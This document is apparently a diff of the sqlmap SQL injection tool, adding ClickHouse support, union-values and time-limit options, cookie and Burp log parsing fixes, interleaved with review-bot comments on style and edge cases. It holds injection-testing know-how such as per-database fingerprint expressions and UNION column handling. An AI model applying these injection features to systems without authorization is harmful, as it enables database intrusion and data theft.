+ >>> decodeDbmsHexValue('00310032003300200031') == u'123 1'
+ True
+ >>> decodeDbmsHexValue('0x31003200330020003100') == u'123 1'
+ True
>>> decodeDbmsHexValue('313233203') == u'123 ?'
True
>>> decodeDbmsHexValue(['0x31', '0x32']) == [u'1', u'2']
@@ -4978,6 +4995,9 @@ def _(value):
if not isinstance(retVal, six.text_type):
retVal = getUnicode(retVal, conf.encoding or UNICODE_ENCODING)
+ if u"\x00" in retVal:
+ retVal = retVal.replace(u"\x00", u"")
+
return retVal
try:
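Review bot: The added `replace(u"\x00", u"")` has no comment saying why NUL characters are dropped. The doctests added to `decodeDbmsHexValue` in the previous hunk suggest it exists for wide-character values such as `31003200...`. A comment like `# NOTE: drops NUL characters left by UTF-16 style hex output` would record that, and should state that genuine NUL characters in retrieved data are removed as well. The `if u"\x00" in retVal` guard is redundant, since `replace` changes nothing without a match. The enclosing `_` helper starts outside the hunk.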
@@ -5066,6 +5086,7 @@ def resetCookieJar(cookieJar):
logger.info(infoMsg)
content = readCachedFileContent(conf.loadCookies)
+ content = re.sub("(?im)^#httpOnly_", "", content)
lines = filterNone(line.strip() for line in content.split("\n") if not line.startswith('#'))
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.COOKIE_JAR)
os.close(handle)
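Review bot: The `re.sub("(?im)^#httpOnly_", "", content)` line needs a comment, because without one it reads as un-commenting arbitrary lines of the cookie file. Netscape-format cookie files store HttpOnly cookies with a `#HttpOnly_` line prefix, and the `startswith('#')` filter on the next line would otherwise drop them as comments. `# NOTE: keep HttpOnly cookies, which are stored with a '#HttpOnly_' line prefix` says that. `resetCookieJar` continues outside the hunk.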
@@ -5327,6 +5348,7 @@ def _parseBurpLog(content):
continue
getPostReq = False
+ forceBody = False
url = None
host = None
method = None
@@ -5347,7 +5369,7 @@ def _parseBurpLog(content):
line = line.strip('\r')
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
- if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
+ if len(line.strip()) == 0 and method and (method != HTTPMETHOD.GET or forceBody) and data is None:
data = ""
params = True
@@ -5384,16 +5406,18 @@ def _parseBurpLog(content):
elif key.upper() == HTTP_HEADER.HOST.upper():
if '://' in value:
scheme, value = value.split('://')[:2]
- splitValue = value.split(":")
- host = splitValue[0]
- if len(splitValue) > 1:
- port = filterStringValue(splitValue[1], "[0-9]")
+ port = extractRegexResult(r":(?P\d+)\Z", value)
+ if port:
+ value = value[:-(1 + len(port))]
+
+ host = value
# Avoid to add a static content length header to
# headers and consider the following lines as
# POSTed data
if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
+ forceBody = True
params = True
# Avoid proxy and connection type related headers
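Review bot: `forceBody`, set here and used in the two earlier `_parseBurpLog` hunks (its initialisation and the `method != HTTPMETHOD.GET or forceBody` test), is introduced without any comment on what it overrides. Something like `# NOTE: a Content-Length header means a body follows, even for a GET request` next to `forceBody = True` would explain the new condition. The flag is set for any Content-Length header regardless of its value, so a request carrying a zero length also gets `data = ""`. If that is intended, it belongs in the same comment. The function starts and ends outside these hunks.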
diff --git a/lib/core/compat.py b/lib/core/compat.py
index 851e57eb87d..629c844b08a 100644
--- a/lib/core/compat.py
+++ b/lib/core/compat.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/convert.py b/lib/core/convert.py
index c6f86aa1fe1..2a211125ae3 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -16,6 +16,7 @@
import json
import re
import sys
+import time
from lib.core.bigarray import BigArray
from lib.core.compat import xrange
@@ -134,6 +135,23 @@ def dejsonize(data):
return json.loads(data)
+def rot13(data):
+ """
+ Returns ROT13 encoded/decoded text
+
+ >>> rot13('foobar was here!!')
+ 'sbbone jnf urer!!'
+ >>> rot13('sbbone jnf urer!!')
+ 'foobar was here!!'
+ """
+
+ # Reference: https://stackoverflow.com/a/62662878
+ retVal = ""
+ alphabit = "abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ"
+ for char in data:
+ retVal += alphabit[alphabit.index(char) + 13] if char in alphabit else char
+ return retVal
+
def decodeHex(value, binary=True):
"""
Returns a decoded representation of provided hexadecimal value
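Review bot: `rot13` builds its result with repeated `retVal += ...` and an `alphabit.index(char)` scan per character, where one `"".join(...)` over the characters does the same in a single expression. `alphabit` is also a typo for `alphabet`. For example: `return "".join(alphabet[alphabet.index(_) + 13] if _ in alphabet else _ for _ in data)`. The doubled alphabet string deserves a comment, since that doubling is what lets `index + 13` wrap around without a modulo.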
@@ -334,6 +352,10 @@ def getUnicode(value, encoding=None, noneToNull=False):
True
"""
+ # Best position for --time-limit mechanism
+ if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit):
+ raise SystemExit
+
if noneToNull and value is None:
return NULL
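Review bot: Raising `SystemExit` from inside `getUnicode` turns a text-conversion helper into a hidden exit point, and the comment `Best position for --time-limit mechanism` does not say what that placement relies on. In a worker thread `SystemExit` ends only that thread, and a bare `except:` around any `getUnicode` call swallows it, so the limit may not stop the run where a caller does either. Those callers are outside this hunk. The comment should at least record this, e.g. `# NOTE: enforced here as a frequently reached call; callers must not swallow SystemExit`. `time.time()` also follows wall-clock adjustments, which matters for long limits.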
diff --git a/lib/core/data.py b/lib/core/data.py
index c2b4325d719..668483495dc 100644
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index eadcb9cf7ab..d595f905d7d 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -49,6 +49,19 @@ def __getattr__(self, item):
else:
return None
+ def __delattr__(self, item):
+ """
+ Deletes attributes
+ """
+
+ try:
+ return self.pop(item)
+ except KeyError:
+ if self.keycheck:
+ raise AttributeError("unable to access item '%s'" % item)
+ else:
+ return None
+
def __setattr__(self, item, value):
"""
Maps attributes to values
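Review bot: `__delattr__` returns `self.pop(item)` and `None`, but a `del obj.attr` statement discards whatever the hook returns, so the `return`s suggest a value no caller can see. A bare `self.pop(item)` and dropping the `else: return None` branch say the same thing more plainly. The docstring `Deletes attributes` could also state that a missing key raises `AttributeError` only when `self.keycheck` is set.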
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 433ae3f959b..d2e7f4715d8 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index 54410f6dbf6..4ae9c89471c 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index 157adc2aded..531ef10284f 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -38,6 +38,7 @@
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import VERTICA_ALIASES
from lib.core.settings import VIRTUOSO_ALIASES
+from lib.core.settings import CLICKHOUSE_ALIASES
FIREBIRD_TYPES = {
261: "BLOB",
@@ -241,6 +242,7 @@
DBMS.PRESTO: (PRESTO_ALIASES, "presto-python-client", "https://github.com/prestodb/presto-python-client", None),
DBMS.ALTIBASE: (ALTIBASE_ALIASES, None, None, None),
DBMS.MIMERSQL: (MIMERSQL_ALIASES, "mimerpy", "https://github.com/mimersql/MimerPy", None),
+ DBMS.CLICKHOUSE: (CLICKHOUSE_ALIASES, "clickhouse_connect", "https://github.com/ClickHouse/clickhouse-connect", None),
DBMS.CRATEDB: (CRATEDB_ALIASES, "python-psycopg2", "https://github.com/psycopg/psycopg2", "postgresql"),
DBMS.CUBRID: (CUBRID_ALIASES, "CUBRID-Python", "https://github.com/CUBRID/cubrid-python", None),
DBMS.CACHE: (CACHE_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & https://github.com/jpype-project/jpype", None),
@@ -268,7 +270,7 @@
DBMS.ACCESS: "CVAR(NULL)",
DBMS.MAXDB: "ALPHA(NULL)",
DBMS.MSSQL: "DIFFERENCE(NULL,NULL)",
- DBMS.MYSQL: "QUARTER(NULL)",
+ DBMS.MYSQL: "QUARTER(NULL XOR NULL)",
DBMS.ORACLE: "INSTR2(NULL,NULL)",
DBMS.PGSQL: "QUOTE_IDENT(NULL)",
DBMS.SQLITE: "UNLIKELY(NULL)",
@@ -286,6 +288,7 @@
DBMS.EXTREMEDB: "NULLIFZERO(hashcode(NULL))",
DBMS.RAIMA: "IF(ROWNUMBER()>0,CONVERT(NULL,TINYINT),NULL))",
DBMS.VIRTUOSO: "__MAX_NOTNULL(NULL)",
+ DBMS.CLICKHOUSE: "halfMD5(NULL) IS NULL",
}
SQL_STATEMENTS = {
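Review bot: The ClickHouse entry `"halfMD5(NULL) IS NULL"` is a predicate, while every other value visible in this dict (`UNLIKELY(NULL)`, `__MAX_NOTNULL(NULL)`, ...) is a bare expression. If the code that consumes these values wraps them in its own `IS NULL` test, the ClickHouse entry would be tested as a boolean result rather than as a NULL. That consumer is not part of this hunk, so it needs checking there. If the predicate form is intentional, a one-line comment saying why this entry differs would stop someone "normalising" it later.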
diff --git a/lib/core/dump.py b/lib/core/dump.py
index 2e3cdfde635..42f713efd9d 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/enums.py b/lib/core/enums.py
index 188bd9fc3c9..54d4177b71d 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -52,6 +52,7 @@ class DBMS(object):
PRESTO = "Presto"
ALTIBASE = "Altibase"
MIMERSQL = "MimerSQL"
+ CLICKHOUSE = "ClickHouse"
CRATEDB = "CrateDB"
CUBRID = "Cubrid"
CACHE = "InterSystems Cache"
@@ -81,6 +82,7 @@ class DBMS_DIRECTORY_NAME(object):
PRESTO = "presto"
ALTIBASE = "altibase"
MIMERSQL = "mimersql"
+ CLICKHOUSE = "clickhouse"
CRATEDB = "cratedb"
CUBRID = "cubrid"
CACHE = "cache"
@@ -104,6 +106,7 @@ class FORK(object):
YELLOWBRICK = "Yellowbrick"
IRIS = "Iris"
YUGABYTEDB = "YugabyteDB"
+ OPENGAUSS = "OpenGauss"
class CUSTOM_LOGGING(object):
PAYLOAD = 9
diff --git a/lib/core/exception.py b/lib/core/exception.py
index 8e487ce30e9..f923705d912 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/gui.py b/lib/core/gui.py
index fa6f2694943..00f98ee75c4 100644
--- a/lib/core/gui.py
+++ b/lib/core/gui.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -223,7 +223,7 @@ def enqueue(stream, queue):
helpmenu.add_command(label="Wiki pages", command=lambda: webbrowser.open(WIKI_PAGE))
helpmenu.add_command(label="Report issue", command=lambda: webbrowser.open(ISSUES_PAGE))
helpmenu.add_separator()
- helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2023\n\n (%s)" % DEV_EMAIL_ADDRESS))
+ helpmenu.add_command(label="About", command=lambda: _tkinter_messagebox.showinfo("About", "Copyright (c) 2006-2024\n\n (%s)" % DEV_EMAIL_ADDRESS))
menubar.add_cascade(label="Help", menu=helpmenu)
window.config(menu=menubar)
diff --git a/lib/core/log.py b/lib/core/log.py
index 64e4f1b71dd..33e6a36b5f7 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/option.py b/lib/core/option.py
index 46583762048..55cf4371381 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -815,7 +815,7 @@ def _setTamperingFunctions():
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
for name, function in inspect.getmembers(module, inspect.isfunction):
- if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or hasattr(inspect, "getargspec") and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
+ if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
found = True
kb.tamperFunctions.append(function)
function.__name__ = module.__name__
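Review bot: With the `hasattr(inspect, "getargspec")` guard removed, the fallback branch in `_setTamperingFunctions` depends on the shim that lib/core/patch.py installs in this same commit. On an interpreter without `inspect.getargspec`, a `tamper` function that fails the `inspect.signature` test reaches `inspect.getargspec(function)` and raises `AttributeError` unless that patch has already run. The ordering is not visible here. A comment such as `# NOTE: inspect.getargspec is provided by lib/core/patch.py where the stdlib lacks it` would record the coupling. Calling `inspect.getargspec(function)` once and reusing the result would also shorten the line.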
@@ -929,7 +929,7 @@ def _setPreprocessFunctions():
else:
try:
function(_urllib.request.Request("http://localhost"))
- except:
+ except Exception as ex:
tbMsg = traceback.format_exc()
if conf.debug:
@@ -943,8 +943,8 @@ def _setPreprocessFunctions():
errMsg = "function 'preprocess(req)' "
errMsg += "in preprocess script '%s' " % script
- errMsg += "appears to be invalid "
- errMsg += "(Note: find template script at '%s')" % filename
+ errMsg += "had issues in a test run ('%s'). " % getSafeExString(ex)
+ errMsg += "You can find a template script at '%s'" % filename
raise SqlmapGenericException(errMsg)
def _setPostprocessFunctions():
@@ -1696,11 +1696,20 @@ def _cleanupOptions():
try:
conf.ignoreCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.ignoreCode)]
except ValueError:
- errMsg = "options '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
+ errMsg = "option '--ignore-code' should contain a list of integer values or a wildcard value '%s'" % IGNORE_CODE_WILDCARD
raise SqlmapSyntaxException(errMsg)
else:
conf.ignoreCode = []
+ if conf.abortCode:
+ try:
+ conf.abortCode = [int(_) for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.abortCode)]
+ except ValueError:
+ errMsg = "option '--abort-code' should contain a list of integer values"
+ raise SqlmapSyntaxException(errMsg)
+ else:
+ conf.abortCode = []
+
if conf.paramFilter:
conf.paramFilter = [_.strip() for _ in re.split(PARAMETER_SPLITTING_REGEX, conf.paramFilter.upper())]
else:
@@ -1792,6 +1801,9 @@ def _cleanupOptions():
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
break
+ if conf.uValues:
+ conf.uCols = "%d-%d" % (1 + conf.uValues.count(','), 1 + conf.uValues.count(','))
+
if conf.testFilter:
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)
@@ -2136,6 +2148,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
+ kb.processNonCustom = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
@@ -2158,6 +2171,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.smokeMode = False
kb.reduceTests = None
kb.sslSuccess = False
+ kb.startTime = time.time()
kb.stickyDBMS = False
kb.suppressResumeInfo = False
kb.tableFrom = None
@@ -2572,6 +2586,10 @@ def _basicOptionValidation():
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
+ if conf.uValues and conf.uChar:
+ errMsg = "option '--union-values' is incompatible with option '--union-char'"
+ raise SqlmapSyntaxException(errMsg)
+
if conf.base64Parameter and conf.tamper:
errMsg = "option '--base64' is incompatible with option '--tamper'"
raise SqlmapSyntaxException(errMsg)
@@ -2655,6 +2673,9 @@ def _basicOptionValidation():
raise SqlmapSyntaxException(errMsg)
if conf.paramExclude:
+ if re.search(r"\A\w+,", conf.paramExclude):
+ conf.paramExclude = r"\A(%s)\Z" % ('|'.join(re.escape(_).strip() for _ in conf.paramExclude.split(',')))
+
try:
re.compile(conf.paramExclude)
except Exception as ex:
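Review bot: In the new `--param-exclude` list handling, `re.escape(_).strip()` strips after escaping, which corrupts names that have surrounding spaces. `re.escape` turns a space into backslash-space, so for `"b "` the `strip()` removes only the space and leaves a trailing backslash that then escapes the `|` joining the alternatives. A leading space is kept as a literal. Swapping the order fixes both cases: `'|'.join(re.escape(_.strip()) for _ in conf.paramExclude.split(','))`. A comment that a plain comma-separated list is converted into an anchored alternation would also help, since the option otherwise takes a regex.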
@@ -2791,6 +2812,11 @@ def _basicOptionValidation():
errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
raise SqlmapSyntaxException(errMsg)
+ if conf.uValues and (not re.search(r"\A['\w\s.,()%s-]+\Z" % CUSTOM_INJECTION_MARK_CHAR, conf.uValues) or conf.uValues.count(CUSTOM_INJECTION_MARK_CHAR) != 1):
+ errMsg = "option '--union-values' must contain valid UNION column values, along with the injection position "
+ errMsg += "(e.g. 'NULL,1,%s,NULL')" % CUSTOM_INJECTION_MARK_CHAR
+ raise SqlmapSyntaxException(errMsg)
+
if conf.skip and conf.testParameter:
if intersect(conf.skip, conf.testParameter):
errMsg = "option '--skip' is incompatible with option '-p'"
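Review bot: `CUSTOM_INJECTION_MARK_CHAR` is interpolated unescaped into the character class of the `--union-values` check. That stays correct only while the constant is not a class metacharacter such as `]`, `^` or `\`. Passing `re.escape(CUSTOM_INJECTION_MARK_CHAR)` as the `%` argument removes that dependency at no cost. The pattern and the `count(...) != 1` test would read more easily as two separate `if` statements with their own messages, since they reject different mistakes.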
@@ -2817,10 +2843,6 @@ def _basicOptionValidation():
errMsg = "value for option '--time-sec' must be a positive integer"
raise SqlmapSyntaxException(errMsg)
- if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
- errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
- raise SqlmapSyntaxException(errMsg)
-
if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.wizard, conf.dependencies, conf.purge, conf.listTampers)):
errMsg = "option '--crack' should be used as a standalone"
raise SqlmapSyntaxException(errMsg)
diff --git a/lib/core/optiondict.py b/lib/core/optiondict.py
index 48343a494ac..a404cccaaa1 100644
--- a/lib/core/optiondict.py
+++ b/lib/core/optiondict.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -39,6 +39,7 @@
"authType": "string",
"authCred": "string",
"authFile": "string",
+ "abortCode": "string",
"ignoreCode": "string",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
@@ -117,6 +118,7 @@
"uCols": "string",
"uChar": "string",
"uFrom": "string",
+ "uValues": "string",
"dnsDomain": "string",
"secondUrl": "string",
"secondReq": "string",
@@ -204,6 +206,7 @@
"General": {
"trafficFile": "string",
+ "abortOnEmpty": "boolean",
"answers": "string",
"batch": "boolean",
"base64Parameter": "string",
@@ -236,6 +239,7 @@
"skipWaf": "boolean",
"testFilter": "string",
"testSkip": "string",
+ "timeLimit": "float",
"webRoot": "string",
},
diff --git a/lib/core/patch.py b/lib/core/patch.py
index 18681432519..a5d821291ac 100644
--- a/lib/core/patch.py
+++ b/lib/core/patch.py
@@ -1,11 +1,13 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import codecs
+import collections
+import inspect
import os
import random
import re
@@ -93,6 +95,26 @@ def _(self, *args):
else:
os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))
+ # Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
+ # Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
+ if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
+ ArgSpec = collections.namedtuple("ArgSpec", ("args", "varargs", "keywords", "defaults"))
+
+ def makelist(data):
+ if isinstance(data, (tuple, list, set, dict)):
+ return list(data)
+ elif data:
+ return [data]
+ else:
+ return []
+
+ def getargspec(func):
+ spec = inspect.getfullargspec(func)
+ kwargs = makelist(spec[0]) + makelist(spec.kwonlyargs)
+ return ArgSpec(kwargs, spec[1], spec[2], spec[3])
+
+ inspect.getargspec = getargspec
+
def resolveCrossReferences():
"""
Place for cross-reference resolution
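Review bot: In the `getargspec` shim the combined list of positional and keyword-only names is stored in a variable called `kwargs`. The spec is also read partly by index (`spec[0]`, `spec[1]`) and partly by name (`spec.kwonlyargs`), which makes the mapping onto `ArgSpec` hard to check. `args = makelist(spec.args) + makelist(spec.kwonlyargs)` followed by `return ArgSpec(args, spec.varargs, spec.varkw, spec.defaults)` is equivalent and self-describing. A comment should note that this version reports keyword-only names inside `args`, which differs from what the original function returned. The enclosing function starts outside the hunk.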
diff --git a/lib/core/profiling.py b/lib/core/profiling.py
index 4fddab24a7e..6d3de015b52 100644
--- a/lib/core/profiling.py
+++ b/lib/core/profiling.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/readlineng.py b/lib/core/readlineng.py
index 0a6c1dd5185..602ccafa108 100644
--- a/lib/core/readlineng.py
+++ b/lib/core/readlineng.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/replication.py b/lib/core/replication.py
index 236d1ed4463..c425568fb00 100644
--- a/lib/core/replication.py
+++ b/lib/core/replication.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/revision.py b/lib/core/revision.py
index 7abd30cd03e..b3e5a046aad 100644
--- a/lib/core/revision.py
+++ b/lib/core/revision.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/session.py b/lib/core/session.py
index c50d7b03e87..52b6ed6438f 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 3223a88e4ec..3241a120f8f 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python
"""
-Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
+Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
@@ -20,7 +20,7 @@
from thirdparty.six import unichr as _unichr
# sqlmap version (...)
-VERSION = "1.7"
+VERSION = "1.8"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -283,6 +283,7 @@
ALTIBASE_SYSTEM_DBS = ("SYSTEM_",)
MIMERSQL_SYSTEM_DBS = ("information_schema", "SYSTEM",)
CRATEDB_SYSTEM_DBS = ("information_schema", "pg_catalog", "sys")
+CLICKHOUSE_SYSTEM_DBS = ("information_schema", "INFORMATION_SCHEMA", "system")
CUBRID_SYSTEM_DBS = ("DBA",)
CACHE_SYSTEM_DBS = ("%Dictionary", "INFORMATION_SCHEMA", "%SYS")
EXTREMEDB_SYSTEM_DBS = ("",)
@@ -293,7 +294,7 @@
# Note: () + ()
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
MYSQL_ALIASES = ("mysql", "my") + ("mariadb", "maria", "memsql", "tidb", "percona", "drizzle")
-PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb")
+PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg") + ("cockroach", "cockroachdb", "amazon redshift", "redshift", "greenplum", "yellowbrick", "enterprisedb", "yugabyte", "yugabytedb", "opengauss")
ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
SQLITE_ALIASES = ("sqlite", "sqlite3")
ACCESS_ALIASES = ("microsoft access", "msaccess", "access", "jet")
@@ -313,6 +314,7 @@
MIMERSQL_ALIASES = ("mimersql", "mimer")
CRATEDB_ALIASES = ("cratedb", "crate")
CUBRID_ALIASES = ("cubrid",)
+CLICKHOUSE_ALIASES = ("clickhouse",)
CACHE_ALIASES = ("intersystems cache", "cachedb", "cache", "iris")
EXTREMEDB_ALIASES = ("extremedb", "extreme")
FRONTBASE_ALIASES = ("frontbase",)
@@ -321,10 +323,10 @@
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
-SUPPORTED_DBMS = set(MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES + H2_ALIASES + INFORMIX_ALIASES + MONETDB_ALIASES + DERBY_ALIASES + VERTICA_ALIASES + MCKOI_ALIASES + PRESTO_ALIASES + ALTIBASE_ALIASES + MIMERSQL_ALIASES + CRATEDB_ALIASES + CUBRID_ALIASES + CACHE_ALIASES + EXTREMEDB_ALIASES + RAIMA_ALIASES + VIRTUOSO_ALIASES)
